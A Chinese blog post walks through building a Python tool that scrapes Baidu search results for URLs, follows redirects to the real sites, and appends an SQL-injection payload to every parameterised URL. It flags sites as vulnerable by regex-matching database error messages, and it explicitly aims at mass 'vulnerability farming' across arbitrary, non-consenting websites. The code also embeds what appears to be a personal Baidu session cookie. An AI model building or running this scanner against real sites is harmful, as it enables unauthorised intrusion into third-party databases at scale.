前言:
曾经在网上发现了一款sql注入自动扫描工具–傀儡扫描器,虽然好用但是时不时就会莫名其妙的暂停,所以想尝试写一个类似的工具锻炼一下自己的python(大佬勿喷🤭)
爬虫
首先想要获得大量的漏洞那我们就需要大量的url来提供测试,所以需要对网站进行爬取,可以通过对百度根据关键字进行爬虫,然后利用xpath来提取关键字符
def baidu_search(target,page):
parment = {
'wd': target,
'pn': (page*10)
}
url = "https://www.baidu.com/s?ie=utf-8&tn=SE_PSStatistics_p1d9m0nf&p_tk=5922EG4%2BtDYMH4cXzQyoeoiVui3lG1X%2BRvRh88szQUd4z99uxlCQ03vp7snTCsYJAxPvx4GsF6t4gqxT2Mxioj4XGndlZX1m%2Fi7cSnkGsZwvBwu3%2BrenWNED9IqLRGhWBBGz&p_timestamp=1605835171&p_signature=a9f4e7b5639627ec3a4934a1977e6e15"
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
'cookie':'BIDUPSID=F3EB4BA37D4753BF640A5ECA6D31240D; BAIDUID=05DC758E7BC482A1E483C1C9737176CA:FG=1; PSTM=1598272642; BD_UPN=13314752; ispeed_lsm=2; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; H_PS_PSSID=1464_33059_31660_32970_33098_33101_32962_26350; BDRCVFR[gltLrB7qNCt]=mbxnW11j9Dfmh7GuZR8mvqV; delPer=0; BD_CK_SAM=1; PSINO=5; H_PS_645EC=03b9lBvk8tC8aeNMx12CQ5pc6b5DiB6LyW5VHgdx10UKfBSq%2FrkohOHJCeT1hIjm6GC%2BVj3cFv2MvnjFVzz6; BA_HECTOR=a08l002g040h8ha1pl1fre6180q; kleck=9820b890c953eeae5f70c952f62a797d; COOKIE_SESSION=58510_0_7_6_6_9_0_1_6_4_0_0_59355_0_77_0_1605833867_0_1605833790%7C9%23156073_20_1605751873%7C9; BDRCVFR[t8qxwL5sMGc]=mk3SLVN4HKm; BDRCVFR[Fc9oatPmwxn]=mk3SLVN4HKm; rsv_jmp_slow=1605834338318; ZD_ENTRY=baidu'
}
test = requests.get(url, params=parment,headers=header)
baidu = test.text
print(test.url)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
baidu.encode('UTF-8')
html = etree.HTML(baidu)
html_data = html.xpath('//*[@class="t"]/a/@href')
for i in html_data:
print(i)
这个样子就可以获取到我们想要的网站url了,但是这个链接输出只是百度的一个超链接,需要再跳转我们才可以访问到我们想要的链接,所以需要再次request然后获取到request.url的值
二次爬虫
这个爬虫通过下面的target.url可以成功获取到url的值。
def target_link(urls):
url = urls
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
}
try:
target = requests.get(url, headers=header, timeout=5, verify=False)
target_url = target.url
with open('url.txt', 'a', encoding='UTF-8') as f:
f.write(str(target_url))
f.write('\n')
except:
pass
这里就是对第一次爬取百度的超链接的一个二次爬虫,从而得到网站真正的url,然后输入写入文件。
检测注入
接下来就是最后一步,由于只是简单的检测注入,可以输入单引号使网站报错,然后通过正则匹配关键字来发现报错的内容然后输出就可以了。
def sql_check(url):
if '?' not in url:
print('error')
return False
urls = url + "/**/and/**/'1'='2"
r = requests.get(urls)
respose = r.text
DBMS_ERRORS = {
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (
r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver",
r"Warning.*mssql_.*",
r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.",
r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (
r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*",
r"Warning.*\Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
"SQLite": (
r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException",
r"Warning.*sqlite_.*",
r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if (re.search(regex, respose)):
print(url)
with open('example.txt', 'a', encoding='UTF-8') as file:
file.write(str(url))
print('存在漏洞:' + url)
file.write('\n')
这个代码最开始?是判断网站是否是xx.xxx?xxx=xxx如果不是的话自动忽略,可以节省时间,然后下面是对url的一个拼接,通过添加"//and//‘1’='2"来使网站报错,然后获取网站的内容,用下面的匹配式进行匹配(网上嫖的),最后进行输出,同时写入文件中。
结语
这里只是简单的介绍了一下工具的思路,最后采用多进程来加快速度,实现批量刷洞。
ps:工具已经分享到了csdn上。可以自行下载。(工具105行有个小bug,需要大家调试一哈哦)